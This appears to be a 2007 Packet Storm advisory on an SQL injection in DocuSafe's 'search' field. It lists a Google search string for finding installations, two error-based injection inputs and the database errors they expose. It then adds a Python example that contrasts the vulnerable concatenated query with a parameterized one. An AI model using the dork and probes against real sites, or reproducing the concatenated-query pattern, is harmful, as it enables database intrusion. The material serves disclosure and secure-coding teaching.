docusafe-sql.txt

2007-11-15T00:00:00
ID PACKETSTORM:60907
Type packetstorm
Reporter The-0utl4w
Modified 2007-11-15T00:00:00

Description

                                        
                                            `DocuSafe "Search" SQL Injection  
  
Aria-Security Team,  
http://Aria-Security.net  
-------------------------------  
Shout Outs: AurA, imm02tal  
Vendor: http://gartha.net  
Google Search: intitle:Corporate Contact System  
  
Insert your command in the "search" section.  
example:  
'having 1=1--  
Result:  
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr) Like ''having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'.  
  
or  
'group by tblMain.fldArtNr having 1=1--  
result:  
  
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'  
  
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr) Like ''group by tblMain.fldArtNr having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'.  
  
/includes/common.asp, line 62  
  
  
Regards,  
The-0utl4w  
Credit goes to Aria-Security.Net  
`
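
Added example, not part of the original advisory and not DocuSafe's code: the concatenated query shape implied by the error text, beside a bound-parameter version and a handler that keeps driver errors out of the response. It assumes Python's sqlite3 as a stand-in for the Access/ODBC backend; the SELECT list, the sample rows and the function names are hypothetical.

```python
import logging
import sqlite3

log = logging.getLogger("search")

def make_db():
    # Constructed sample rows; table and column names come from the error text.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tblMain (fldArtNr TEXT, fldKDSrev INTEGER)")
    db.executemany("INSERT INTO tblMain VALUES (?, ?)",
                   [("A-100", 1), ("A-100", 2), ("B-200", 1)])
    return db

def search_concatenated(db, term):
    # Weak form: the search term becomes part of the SQL text itself.
    # The SELECT list is an assumption; only the WHERE fragment is on the page.
    sql = ("SELECT fldArtNr, fldKDSrev FROM tblMain "
           "WHERE (((tblMain.fldArtNr) LIKE '" + term + "')) "
           "ORDER BY tblMain.fldArtNr, fldKDSrev DESC")
    return db.execute(sql).fetchall()

def search_bound(db, term):
    # Corrected form: the term is bound as data and never parsed as SQL.
    sql = ("SELECT fldArtNr, fldKDSrev FROM tblMain "
           "WHERE tblMain.fldArtNr LIKE ? "
           "ORDER BY tblMain.fldArtNr, fldKDSrev DESC")
    return db.execute(sql, (term,)).fetchall()

def handle_search(db, term, search):
    # Driver errors are logged server-side; the client gets a fixed message,
    # so query text and file paths like those in the advisory are not echoed.
    try:
        return search(db, term), "ok"
    except sqlite3.Error as exc:
        log.error("search failed for %r: %s", term, exc)
        return [], "Search failed."

if __name__ == "__main__":
    db = make_db()
    for term in ("A-1%", "'having 1=1--",
                 "'group by tblMain.fldArtNr having 1=1--"):
        for fn in (search_concatenated, search_bound):
            print(fn.__name__, repr(term), handle_search(db, term, fn))
```

With the two inputs from the advisory, the concatenated query fails to parse while the bound query treats them as an ordinary LIKE pattern that matches no rows.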